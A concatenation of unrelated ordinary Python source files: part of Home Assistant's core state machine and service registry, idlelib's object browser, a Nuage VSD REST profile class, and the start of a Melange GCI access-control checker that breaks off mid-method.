            if state.domain == domain_filter
        ]

    def all(self) -> List[State]:
        """Create a list of all states.

        Thread-safe wrapper around async_all.
        """
        return run_callback_threadsafe(  # type: ignore
            self._loop, self.async_all
        ).result()

    @callback
    def async_all(self) -> List[State]:
        """Create a list of all states.

        This method must be run in the event loop.
        """
        return list(self._states.values())

    def get(self, entity_id: str) -> Optional[State]:
        """Retrieve state of entity_id or None if not found.

        Async friendly.
        """
        return self._states.get(entity_id.lower())

    def is_state(self, entity_id: str, state: str) -> bool:
        """Test if entity exists and is in specified state.

        Async friendly.
        """
        state_obj = self.get(entity_id)
        return state_obj is not None and state_obj.state == state

    def remove(self, entity_id: str) -> bool:
        """Remove the state of an entity.

        Returns boolean to indicate if an entity was removed.

        Thread-safe wrapper around async_remove.
        """
        return run_callback_threadsafe(  # type: ignore
            self._loop, self.async_remove, entity_id
        ).result()

    @callback
    def async_remove(self, entity_id: str) -> bool:
        """Remove the state of an entity.

        Returns boolean to indicate if an entity was removed.

        This method must be run in the event loop.
        """
        entity_id = entity_id.lower()
        old_state = self._states.pop(entity_id, None)

        if old_state is None:
            return False

        # Removal is broadcast as a state-changed event with new_state None.
        self._bus.async_fire(
            EVENT_STATE_CHANGED,
            {"entity_id": entity_id, "old_state": old_state, "new_state": None},
        )
        return True

    def set(
        self,
        entity_id: str,
        new_state: str,
        attributes: Optional[Dict] = None,
        force_update: bool = False,
        context: Optional[Context] = None,
    ) -> None:
        """Set the state of an entity, add entity if it does not exist.

        Attributes is an optional dict to specify attributes of this state.

        If you just update the attributes and not the state, last changed will
        not be affected.

        Thread-safe wrapper around async_set.
        """
        run_callback_threadsafe(
            self._loop,
            self.async_set,
            entity_id,
            new_state,
            attributes,
            force_update,
            context,
        ).result()

    @callback
    def async_set(
        self,
        entity_id: str,
        new_state: str,
        attributes: Optional[Dict] = None,
        force_update: bool = False,
        context: Optional[Context] = None,
    ) -> None:
        """Set the state of an entity, add entity if it does not exist.

        Attributes is an optional dict to specify attributes of this state.

        If you just update the attributes and not the state, last changed will
        not be affected.

        This method must be run in the event loop.
        """
        entity_id = entity_id.lower()
        new_state = str(new_state)
        attributes = attributes or {}
        old_state = self._states.get(entity_id)
        if old_state is None:
            same_state = False
            same_attr = False
            last_changed = None
        else:
            # force_update makes an identical state still count as a change.
            same_state = old_state.state == new_state and not force_update
            same_attr = old_state.attributes == MappingProxyType(attributes)
            # Preserve last_changed when only attributes changed.
            last_changed = old_state.last_changed if same_state else None

        # No-op when nothing changed at all.
        if same_state and same_attr:
            return

        if context is None:
            context = Context()

        state = State(entity_id, new_state, attributes, last_changed, None, context)
        self._states[entity_id] = state
        self._bus.async_fire(
            EVENT_STATE_CHANGED,
            {"entity_id": entity_id, "old_state": old_state, "new_state": state},
            EventOrigin.local,
            context,
        )
class Service:
    """Representation of a callable service."""

    __slots__ = ["func", "schema", "is_callback", "is_coroutinefunction"]

    def __init__(
        self,
        func: Callable,
        schema: Optional[vol.Schema],
        context: Optional[Context] = None,
    ) -> None:
        """Initialize a service.

        NOTE(review): ``context`` is accepted but never stored or used in this
        class — confirm whether it can be removed from callers.
        """
        self.func = func
        self.schema = schema
        # Properly detect wrapped functions:
        # functools.partial hides the underlying callable, so unwrap before
        # classifying the function as callback / coroutine below.
        while isinstance(func, functools.partial):
            func = func.func
        self.is_callback = is_callback(func)
        self.is_coroutinefunction = asyncio.iscoroutinefunction(func)
class ServiceCall:
    """Representation of a call to a service."""

    # One ServiceCall is created per invocation; __slots__ keeps them cheap.
    __slots__ = ["domain", "service", "data", "context"]

    def __init__(
        self,
        domain: str,
        service: str,
        data: Optional[Dict] = None,
        context: Optional[Context] = None,
    ) -> None:
        """Initialize a service call.

        Domain and service are normalized to lower case; data is exposed as a
        read-only mapping.
        """
        self.domain = domain.lower()
        self.service = service.lower()
        self.data = MappingProxyType(data or {})
        self.context = context or Context()

    def __repr__(self) -> str:
        """Return the representation of the service."""
        if self.data:
            return "<ServiceCall {}.{} (c:{}): {}>".format(
                self.domain, self.service, self.context.id, util.repr_helper(self.data)
            )

        return f"<ServiceCall {self.domain}.{self.service} (c:{self.context.id})>"
class ServiceRegistry:
    """Offer the services over the eventbus."""

    def __init__(self, hass: HomeAssistant) -> None:
        """Initialize a service registry."""
        # Maps lower-cased domain -> {lower-cased service name -> Service}.
        self._services: Dict[str, Dict[str, Service]] = {}
        self._hass = hass

    @property
    def services(self) -> Dict[str, Dict[str, Service]]:
        """Return dictionary with per domain a list of available services.

        Thread-safe wrapper around async_services.
        """
        return run_callback_threadsafe(  # type: ignore
            self._hass.loop, self.async_services
        ).result()

    @callback
    def async_services(self) -> Dict[str, Dict[str, Service]]:
        """Return dictionary with per domain a list of available services.

        This method must be run in the event loop.
        """
        # Shallow-copy the per-domain dicts so callers cannot mutate the
        # registry's internal mapping.
        return {domain: self._services[domain].copy() for domain in self._services}

    def has_service(self, domain: str, service: str) -> bool:
        """Test if specified service exists.

        Async friendly.
        """
        return service.lower() in self._services.get(domain.lower(), [])

    def register(
        self,
        domain: str,
        service: str,
        service_func: Callable,
        schema: Optional[vol.Schema] = None,
    ) -> None:
        """
        Register a service.

        Schema is called to coerce and validate the service data.

        Thread-safe wrapper around async_register.
        """
        run_callback_threadsafe(
            self._hass.loop, self.async_register, domain, service, service_func, schema
        ).result()

    @callback
    def async_register(
        self,
        domain: str,
        service: str,
        service_func: Callable,
        schema: Optional[vol.Schema] = None,
    ) -> None:
        """
        Register a service.

        Schema is called to coerce and validate the service data.

        This method must be run in the event loop.
        """
        domain = domain.lower()
        service = service.lower()
        service_obj = Service(service_func, schema)

        if domain in self._services:
            self._services[domain][service] = service_obj
        else:
            self._services[domain] = {service: service_obj}

        self._hass.bus.async_fire(
            EVENT_SERVICE_REGISTERED, {ATTR_DOMAIN: domain, ATTR_SERVICE: service}
        )

    def remove(self, domain: str, service: str) -> None:
        """Remove a registered service from service handler.

        Thread-safe wrapper around async_remove.
        """
        run_callback_threadsafe(
            self._hass.loop, self.async_remove, domain, service
        ).result()

    @callback
    def async_remove(self, domain: str, service: str) -> None:
        """Remove a registered service from service handler.

        This method must be run in the event loop.
        """
        domain = domain.lower()
        service = service.lower()

        if service not in self._services.get(domain, {}):
            _LOGGER.warning("Unable to remove unknown service %s/%s.", domain, service)
            return

        self._services[domain].pop(service)

        # Drop the domain entry entirely when its last service is removed.
        if not self._services[domain]:
            self._services.pop(domain)

        self._hass.bus.async_fire(
            EVENT_SERVICE_REMOVED, {ATTR_DOMAIN: domain, ATTR_SERVICE: service}
        )

    def call(
        self,
        domain: str,
        service: str,
        service_data: Optional[Dict] = None,
        blocking: bool = False,
        context: Optional[Context] = None,
    ) -> Optional[bool]:
        """
        Call a service.

        Specify blocking=True to wait till service is executed.
        Waits a maximum of SERVICE_CALL_LIMIT.

        If blocking = True, will return boolean if service executed
        successfully within SERVICE_CALL_LIMIT.

        This method will fire an event to call the service.
        This event will be picked up by this ServiceRegistry and any
        other ServiceRegistry that is listening on the EventBus.

        Because the service is sent as an event you are not allowed to use
        the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.

        Thread-safe wrapper around async_call.
        """
        return asyncio.run_coroutine_threadsafe(
            self.async_call(domain, service, service_data, blocking, context),
            self._hass.loop,
        ).result()

    async def async_call(
        self,
        domain: str,
        service: str,
        service_data: Optional[Dict] = None,
        blocking: bool = False,
        context: Optional[Context] = None,
    ) -> Optional[bool]:
        """
        Call a service.

        Specify blocking=True to wait till service is executed.
        Waits a maximum of SERVICE_CALL_LIMIT.

        If blocking = True, will return boolean if service executed
        successfully within SERVICE_CALL_LIMIT.

        This method will fire an event to call the service.
        This event will be picked up by this ServiceRegistry and any
        other ServiceRegistry that is listening on the EventBus.

        Because the service is sent as an event you are not allowed to use
        the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.

        This method is a coroutine.

        Raises ServiceNotFound if domain/service is not registered.
        """
        domain = domain.lower()
        service = service.lower()
        context = context or Context()
        service_data = service_data or {}

        try:
            handler = self._services[domain][service]
        except KeyError:
            raise ServiceNotFound(domain, service) from None

        if handler.schema:
            processed_data = handler.schema(service_data)
        else:
            processed_data = service_data

        service_call = ServiceCall(domain, service, processed_data, context)

        # NOTE(review): the fired event carries the raw service_data, not the
        # schema-processed data used for the actual call — confirm intentional.
        self._hass.bus.async_fire(
            EVENT_CALL_SERVICE,
            {
                ATTR_DOMAIN: domain.lower(),
                ATTR_SERVICE: service.lower(),
                ATTR_SERVICE_DATA: service_data,
            },
            context=context,
        )

        if not blocking:
            self._hass.async_create_task(self._safe_execute(handler, service_call))
            return None

        try:
            # shield so the service keeps running even if we time out waiting.
            with timeout(SERVICE_CALL_LIMIT):
                await asyncio.shield(self._execute_service(handler, service_call))
            return True
        except asyncio.TimeoutError:
            return False

    async def _safe_execute(self, handler: Service, service_call: ServiceCall) -> None:
        """Execute a service and catch exceptions."""
        try:
            await self._execute_service(handler, service_call)
        except Unauthorized:
            _LOGGER.warning(
                "Unauthorized service called %s/%s",
                service_call.domain,
                service_call.service,
            )
        except Exception:  # pylint: disable=broad-except
            _LOGGER.exception("Error executing service %s", service_call)

    async def _execute_service(
        self, handler: Service, service_call: ServiceCall
    ) -> None:
        """Execute a service.

        Dispatches on the handler type detected in Service.__init__:
        callback, coroutine function, or plain function (run in executor).
        """
        if handler.is_callback:
            handler.func(service_call)
        elif handler.is_coroutinefunction:
            await handler.func(service_call)
        else:
            await self._hass.async_add_executor_job(handler.func, service_call)
class Config:
    """Configuration settings for Home Assistant."""

    def __init__(self, hass: HomeAssistant) -> None:
        """Initialize a new config object."""
        self.hass = hass

        self.latitude: float = 0
        self.longitude: float = 0
        self.elevation: int = 0
        self.location_name: str = "Home"
        self.time_zone: datetime.tzinfo = dt_util.UTC
        self.units: UnitSystem = METRIC_SYSTEM
        self.config_source: str = "default"

        # If True, pip install is skipped for requirements on startup
        self.skip_pip: bool = False

        # List of loaded components
        self.components: Set[str] = set()

        # API (HTTP) server configuration, see components.http.ApiConfig
        self.api: Optional[Any] = None

        # Directory that holds the configuration
        self.config_dir: Optional[str] = None

        # List of allowed external dirs to access
        self.whitelist_external_dirs: Set[str] = set()

    def _time_zone_name(self) -> str:
        """Return the configured time zone name, falling back to UTC.

        Uses getattr with a default so tzinfo implementations without a
        ``zone`` attribute (e.g. datetime.timezone) do not raise
        AttributeError; previously this crashed in as_dict/async_store.
        """
        zone = getattr(self.time_zone, "zone", None) if self.time_zone else None
        return zone or dt_util.UTC.zone

    def distance(self, lat: float, lon: float) -> Optional[float]:
        """Calculate distance from Home Assistant.

        Async friendly.
        """
        return self.units.length(
            location.distance(self.latitude, self.longitude, lat, lon), "m"
        )

    def path(self, *path: str) -> str:
        """Generate path to the file within the configuration directory.

        Raises HomeAssistantError if config_dir has not been set yet.

        Async friendly.
        """
        if self.config_dir is None:
            raise HomeAssistantError("config_dir is not set")
        return os.path.join(self.config_dir, *path)

    def is_allowed_path(self, path: str) -> bool:
        """Check if the path is valid for access from outside."""
        assert path is not None

        thepath = pathlib.Path(path)
        try:
            # The file path does not have to exist (its parent should)
            if thepath.exists():
                thepath = thepath.resolve()
            else:
                thepath = thepath.parent.resolve()
        except (FileNotFoundError, RuntimeError, PermissionError):
            return False

        # Allowed when the resolved path lives under any whitelisted dir.
        for whitelisted_path in self.whitelist_external_dirs:
            try:
                thepath.relative_to(whitelisted_path)
                return True
            except ValueError:
                pass

        return False

    def as_dict(self) -> Dict:
        """Create a dictionary representation of the configuration.

        Async friendly.
        """
        return {
            "latitude": self.latitude,
            "longitude": self.longitude,
            "elevation": self.elevation,
            "unit_system": self.units.as_dict(),
            "location_name": self.location_name,
            "time_zone": self._time_zone_name(),
            "components": self.components,
            "config_dir": self.config_dir,
            "whitelist_external_dirs": self.whitelist_external_dirs,
            "version": __version__,
            "config_source": self.config_source,
        }

    def set_time_zone(self, time_zone_str: str) -> None:
        """Help to set the time zone.

        Raises ValueError when the name cannot be resolved to a time zone.
        """
        time_zone = dt_util.get_time_zone(time_zone_str)

        if time_zone:
            self.time_zone = time_zone
            dt_util.set_default_time_zone(time_zone)
        else:
            raise ValueError(f"Received invalid time zone {time_zone_str}")

    @callback
    def _update(
        self,
        *,
        source: str,
        latitude: Optional[float] = None,
        longitude: Optional[float] = None,
        elevation: Optional[int] = None,
        unit_system: Optional[str] = None,
        location_name: Optional[str] = None,
        time_zone: Optional[str] = None,
    ) -> None:
        """Update the configuration from a dictionary.

        Only the keys that are not None are applied.
        """
        self.config_source = source
        if latitude is not None:
            self.latitude = latitude
        if longitude is not None:
            self.longitude = longitude
        if elevation is not None:
            self.elevation = elevation
        if unit_system is not None:
            # Any value other than the imperial constant falls back to metric.
            if unit_system == CONF_UNIT_SYSTEM_IMPERIAL:
                self.units = IMPERIAL_SYSTEM
            else:
                self.units = METRIC_SYSTEM
        if location_name is not None:
            self.location_name = location_name
        if time_zone is not None:
            self.set_time_zone(time_zone)

    async def async_update(self, **kwargs: Any) -> None:
        """Update the configuration from a dictionary, persist, and notify."""
        self._update(source=SOURCE_STORAGE, **kwargs)
        await self.async_store()
        self.hass.bus.async_fire(EVENT_CORE_CONFIG_UPDATE, kwargs)

    async def async_load(self) -> None:
        """Load [homeassistant] core config."""
        store = self.hass.helpers.storage.Store(
            CORE_STORAGE_VERSION, CORE_STORAGE_KEY, private=True
        )
        data = await store.async_load()

        if not data:
            return

        self._update(source=SOURCE_STORAGE, **data)

    async def async_store(self) -> None:
        """Store [homeassistant] core config."""
        data = {
            "latitude": self.latitude,
            "longitude": self.longitude,
            "elevation": self.elevation,
            "unit_system": self.units.name,
            "location_name": self.location_name,
            "time_zone": self._time_zone_name(),
        }

        store = self.hass.helpers.storage.Store(
            CORE_STORAGE_VERSION, CORE_STORAGE_KEY, private=True
        )
        await store.async_save(data)
def _async_create_timer(hass: HomeAssistant) -> None:
    """Create a timer that fires EVENT_TIME_CHANGED every second.

    NOTE(review): the original docstring said the timer "will start on
    HOMEASSISTANT_START", but schedule_tick is invoked immediately at the
    bottom of this function — confirm intended behavior.
    """
    handle = None

    def schedule_tick(now: datetime.datetime) -> None:
        """Schedule a timer tick when the next second rolls around."""
        nonlocal handle

        # Sleep exactly until the next whole-second boundary.
        slp_seconds = 1 - (now.microsecond / 10 ** 6)
        target = monotonic() + slp_seconds
        handle = hass.loop.call_later(slp_seconds, fire_time_event, target)

    @callback
    def fire_time_event(target: float) -> None:
        """Fire next time event."""
        now = dt_util.utcnow()
        hass.bus.async_fire(EVENT_TIME_CHANGED, {ATTR_NOW: now})

        # If we are more than a second late, a tick was missed
        late = monotonic() - target
        if late > 1:
            hass.bus.async_fire(EVENT_TIMER_OUT_OF_SYNC, {ATTR_SECONDS: late})

        schedule_tick(now)

    @callback
    def stop_timer(_: Event) -> None:
        """Stop the timer."""
        if handle is not None:
            handle.cancel()

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_timer)

    _LOGGER.info("Timer:starting")
    schedule_tick(dt_util.utcnow())
| |
# Resolved unresolved git merge conflict: all three conflicting versions of
# this object-browser module were byte-identical, so a single copy is kept.
# XXX TO DO:
# - popup menu
# - support partial or total redisplay
# - more doc strings
# - tooltips

# object browser

# XXX TO DO:
# - for classes/modules, add "open source" to object browser

import re

from idlelib.TreeWidget import TreeItem, TreeNode, ScrolledCanvas

from reprlib import Repr

# Shared Repr instance that truncates long values shown in the tree.
myrepr = Repr()
myrepr.maxstring = 100
myrepr.maxother = 100


class ObjectTreeItem(TreeItem):
    """Generic tree item wrapping an arbitrary Python object."""

    def __init__(self, labeltext, object, setfunction=None):
        self.labeltext = labeltext
        self.object = object
        # Optional callable used to write an edited value back to the parent.
        self.setfunction = setfunction

    def GetLabelText(self):
        return self.labeltext

    def GetText(self):
        return myrepr.repr(self.object)

    def GetIconName(self):
        if not self.IsExpandable():
            return "python"

    def IsEditable(self):
        return self.setfunction is not None

    def SetText(self, text):
        try:
            # NOTE: eval of user-typed text is intentional here (interactive
            # debugger feature) but executes arbitrary code — never reuse
            # this pattern on untrusted input.
            value = eval(text)
            self.setfunction(value)
        except Exception:
            # Keep the old value if evaluation or assignment fails.
            pass
        else:
            self.object = value

    def IsExpandable(self):
        return not not dir(self.object)

    def GetSubList(self):
        """Return child items for every readable attribute of the object."""
        keys = dir(self.object)
        sublist = []
        for key in keys:
            try:
                value = getattr(self.object, key)
            except AttributeError:
                continue
            item = make_objecttreeitem(
                str(key) + " =",
                value,
                lambda value, key=key, object=self.object:
                    setattr(object, key, value))
            sublist.append(item)
        return sublist


class ClassTreeItem(ObjectTreeItem):
    """Tree item for classes; prepends the __bases__ entry."""

    def IsExpandable(self):
        return True

    def GetSubList(self):
        sublist = ObjectTreeItem.GetSubList(self)
        if len(self.object.__bases__) == 1:
            item = make_objecttreeitem("__bases__[0] =",
                                       self.object.__bases__[0])
        else:
            item = make_objecttreeitem("__bases__ =", self.object.__bases__)
        sublist.insert(0, item)
        return sublist


class AtomicObjectTreeItem(ObjectTreeItem):
    """Tree item for scalar values that cannot be expanded."""

    def IsExpandable(self):
        return 0


class SequenceTreeItem(ObjectTreeItem):
    """Tree item for indexable sequences (list, tuple)."""

    def IsExpandable(self):
        return len(self.object) > 0

    def keys(self):
        return range(len(self.object))

    def GetSubList(self):
        sublist = []
        for key in self.keys():
            try:
                value = self.object[key]
            except KeyError:
                continue
            def setfunction(value, key=key, object=self.object):
                object[key] = value
            item = make_objecttreeitem("%r:" % (key,), value, setfunction)
            sublist.append(item)
        return sublist


class DictTreeItem(SequenceTreeItem):
    """Tree item for dicts; children keyed by (sorted, when possible) keys."""

    def keys(self):
        keys = list(self.object.keys())
        try:
            keys.sort()
        except Exception:
            # Keys of mixed, unorderable types are shown unsorted.
            pass
        return keys


# Maps concrete types to their specialized tree-item class; anything not
# listed falls back to ObjectTreeItem in make_objecttreeitem.
dispatch = {
    int: AtomicObjectTreeItem,
    float: AtomicObjectTreeItem,
    str: AtomicObjectTreeItem,
    tuple: SequenceTreeItem,
    list: SequenceTreeItem,
    dict: DictTreeItem,
    type: ClassTreeItem,
}


def make_objecttreeitem(labeltext, object, setfunction=None):
    """Create the appropriate tree item for *object* via the dispatch table."""
    t = type(object)
    if t in dispatch:
        c = dispatch[t]
    else:
        c = ObjectTreeItem
    return c(labeltext, object, setfunction)


def _object_browser(parent):
    """Manual test harness: browse the sys module in a Tk window."""
    import sys
    from tkinter import Tk
    root = Tk()
    root.title("Test ObjectBrowser")
    width, height, x, y = list(map(int, re.split('[x+]', parent.geometry())))
    root.geometry("+%d+%d"%(x, y + 150))
    root.configure(bd=0, bg="yellow")
    root.focus_set()
    sc = ScrolledCanvas(root, bg="white", highlightthickness=0, takefocus=1)
    sc.frame.pack(expand=1, fill="both")
    item = make_objecttreeitem("sys", sys)
    node = TreeNode(sc.canvas, None, item)
    node.update()
    root.mainloop()

if __name__ == '__main__':
    from idlelib.idle_test.htest import run
    run(_object_browser)
| |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUMetadatasFetcher
from .fetchers import NUGlobalMetadatasFetcher
from bambou import NURESTObject
class NUInfrastructureEVDFProfile(NURESTObject):
    """ Represents a InfrastructureEVDFProfile in the VSD

        Notes:
            An Infrastructure eVDF Profile instance contains common parameters used to bootstrap instances of eVDF (encryption enabled virtual distributed firewall).
    """

    __rest_name__ = "infrastructureevdfprofile"
    __resource_name__ = "infrastructureevdfprofiles"

    ## Constants
    CONST_NUAGE_PLATFORM_KVM = "KVM"
    CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
    CONST_NUAGE_PLATFORM_KVM_LXC = "KVM_LXC"
    CONST_NUAGE_PLATFORM_KVM_K8S = "KVM_K8S"
    CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"

    def __init__(self, **kwargs):
        """ Initializes a InfrastructureEVDFProfile instance

            Notes:
                You can specify all parameters while calling this methods.
                A special argument named `data` will enable you to load the
                object from a Python dictionary

            Examples:
                >>> infrastructureevdfprofile = NUInfrastructureEVDFProfile(id=u'xxxx-xxx-xxx-xxx', name=u'InfrastructureEVDFProfile')
                >>> infrastructureevdfprofile = NUInfrastructureEVDFProfile(data=my_dict)
        """

        super(NUInfrastructureEVDFProfile, self).__init__()

        # Backing fields for every read/write attribute; all start unset.
        for attr_name in ("ntp_server_key", "ntp_server_key_id", "name",
                          "last_updated_by", "active_controller",
                          "service_ipv4_subnet", "description",
                          "enterprise_id", "entity_scope", "proxy_dns_name",
                          "use_two_factor", "standby_controller",
                          "nuage_platform", "external_id"):
            setattr(self, "_" + attr_name, None)

        # Map each local attribute onto its VSD REST API counterpart.
        self.expose_attribute(local_name="ntp_server_key", remote_name="NTPServerKey", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="ntp_server_key_id", remote_name="NTPServerKeyID", attribute_type=int, is_required=False, is_unique=False)
        self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=True, is_unique=False)
        self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="active_controller", remote_name="activeController", attribute_type=str, is_required=True, is_unique=False)
        self.expose_attribute(local_name="service_ipv4_subnet", remote_name="serviceIPv4Subnet", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="enterprise_id", remote_name="enterpriseID", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
        self.expose_attribute(local_name="proxy_dns_name", remote_name="proxyDNSName", attribute_type=str, is_required=True, is_unique=False)
        self.expose_attribute(local_name="use_two_factor", remote_name="useTwoFactor", attribute_type=bool, is_required=False, is_unique=False)
        self.expose_attribute(local_name="standby_controller", remote_name="standbyController", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="nuage_platform", remote_name="nuagePlatform", attribute_type=str, is_required=False, is_unique=False, choices=[u'KVM', u'KVM_K8S', u'KVM_LXC'])
        self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)

        # Fetchers
        self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")

        self._compute_args(**kwargs)

    # -- Properties -------------------------------------------------------
    def _rw_property(local_name, doc):
        """Build a plain pass-through property over ``_<local_name>``."""
        private_name = "_" + local_name

        def _getter(self):
            return getattr(self, private_name)

        def _setter(self, value):
            setattr(self, private_name, value)

        return property(_getter, _setter, doc=doc)

    ntp_server_key = _rw_property("ntp_server_key", "If set, this represents the security key for the Gateway to communicate with the NTP server (a VSC). Named `NTPServerKey` in the VSD API.")
    ntp_server_key_id = _rw_property("ntp_server_key_id", "Corresponds to the key ID on the NTP server that matches the NTPServerKey value. Valid values are from 1 to 255 as specified by SR-OS and when value 0 is entered, it means that the NTP Key is not used (VSD/NSG only). Named `NTPServerKeyID` in the VSD API.")
    name = _rw_property("name", "The name of the profile instance.")
    last_updated_by = _rw_property("last_updated_by", "ID of the user who last updated the object. Named `lastUpdatedBy` in the VSD API.")
    active_controller = _rw_property("active_controller", "The IP address of the active Controller (VSC). Named `activeController` in the VSD API.")
    service_ipv4_subnet = _rw_property("service_ipv4_subnet", "K8 Service IPv4 Subnet. Named `serviceIPv4Subnet` in the VSD API.")
    description = _rw_property("description", "A brief description of the infrastructure profile.")
    enterprise_id = _rw_property("enterprise_id", "Enterprise/Organisation associated with this Profile instance. Named `enterpriseID` in the VSD API.")
    entity_scope = _rw_property("entity_scope", "Specify if scope of entity is Data center or Enterprise level. Named `entityScope` in the VSD API.")
    proxy_dns_name = _rw_property("proxy_dns_name", "The DNS name of the proxy device acting as an entry point of eVDF instances to contact VSD. Named `proxyDNSName` in the VSD API.")
    use_two_factor = _rw_property("use_two_factor", "A flag that indicates if two-factor is enabled or not when gateway instances inheriting from this profile are bootstrapped. Named `useTwoFactor` in the VSD API.")
    standby_controller = _rw_property("standby_controller", "The IP address of the standby Controller (VSC). Named `standbyController` in the VSD API.")
    nuage_platform = _rw_property("nuage_platform", "The Hypervisor Platform. Named `nuagePlatform` in the VSD API.")
    external_id = _rw_property("external_id", "External object ID. Used for integration with third party systems. Named `externalID` in the VSD API.")

    # Drop the factory so it does not leak into the public class interface.
    del _rw_property
| |
#!/usr/bin/env python2.5
#
# Copyright 2009 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Access control helper.
See soc.views.helper.access module.
"""
__authors__ = [
'"Madhusudan.C.S" <madhusudancs@gmail.com>',
'"Daniel Hans" <daniel.m.hans@gmail.com>',
'"Lennard de Rijk" <ljvderijk@gmail.com>',
'"Pawel Solyga" <pawel.solyga@gmail.com>',
]
from django.utils.translation import ugettext
from soc.logic.helper import timeline as timeline_helper
from soc.logic.models import host as host_logic
from soc.logic.models import user as user_logic
from soc.views import out_of_band
from soc.views.helper import access
from soc.modules.gci.logic.models import mentor as gci_mentor_logic
from soc.modules.gci.logic.models import organization as gci_org_logic
from soc.modules.gci.logic.models import org_admin as gci_org_admin_logic
from soc.modules.gci.logic.models import program as gci_program_logic
from soc.modules.gci.logic.models import task as gci_task_logic
# User-visible (translatable) error messages raised by the access checks
# in GCIChecker below.
DEF_ALREADY_CLAIMED_A_TASK = ugettext(
    'You have already claimed a task and can therefore not become a mentor '
    'or org admin.')

DEF_CANT_EDIT_MSG = ugettext(
    'This task cannot be edited since it has been claimed at least '
    'once before.')

DEF_CANT_REGISTER = ugettext(
    'You have not completed your first task to register as a student. ')

DEF_MAX_TASKS_REACHED_MSG = ugettext(
    'You have reached the maximum number of Tasks allowed '
    'for your organization for this program.')

DEF_NEED_ROLE_MSG = ugettext(
    'You do not have the required role.')

DEF_NO_ACTIVE_ENTITY_MSG = ugettext(
    'There is no such active entity.')

DEF_NO_FILE_ACCESS_MSG = ugettext(
    'You do not have the necessary privileges to access this file.')

DEF_NO_FILE_SPECIFIED_MSG = ugettext(
    'File to download is not specified')

DEF_NO_PUB_TASK_MSG = ugettext(
    'There is no such published task.')

DEF_PAGE_INACTIVE_MSG = ugettext(
    'This page is inactive at this time.')

DEF_SIGN_UP_AS_OA_MENTOR_MSG = ugettext(
    'You first need to sign up as an Org Admin or a Mentor.')

DEF_NO_TASKS_AFFILIATED = ugettext(
    'There are no tasks affiliated to you.')

DEF_UNEXPECTED_ERROR = ugettext(
    'An unexpected error occurred please file an issue report, make sure you '
    'note the URL.')

DEF_ORG_HAS_TASKS = ugettext(
    'The organization has at least one task which may be claimed.')
class GCIChecker(access.Checker):
    """See soc.views.helper.access.Checker.
    """

    @access.allowDeveloper
    @access.denySidebar
    def checkCanOrgAdminOrMentorEdit(self, django_args,
                                     key_location, check_limit):
        """Checks if the mentors can create task for this program,
        and obeys the task quota limit assigned for their org when check_limit is
        True.

        Args:
          django_args: a dictionary with django's arguments.
          key_location: the key for django_args in which the key_name
                        of the org is stored.
          check_limit: iff true checks if the organization reached the
                       task quota limit for the given program.
        """

        import settings

        self.checkIsUser(django_args)

        user_account = user_logic.logic.getCurrentUser()

        if key_location not in django_args:
            raise out_of_band.AccessViolation(
                message_fmt=DEF_NEED_ROLE_MSG)

        filter = {
            'user': user_account,
            'scope_path': django_args[key_location],
            'status': 'active'
        }

        # Org admin role is sufficient; fall back to the mentor role.
        role_entity = gci_org_admin_logic.logic.getForFields(filter, unique=True)
        if not role_entity:
            role_entity = gci_mentor_logic.logic.getForFields(filter, unique=True)

        if not role_entity:
            raise out_of_band.AccessViolation(
                message_fmt=DEF_SIGN_UP_AS_OA_MENTOR_MSG)

        # pylint: disable=E1103
        program_entity = role_entity.program

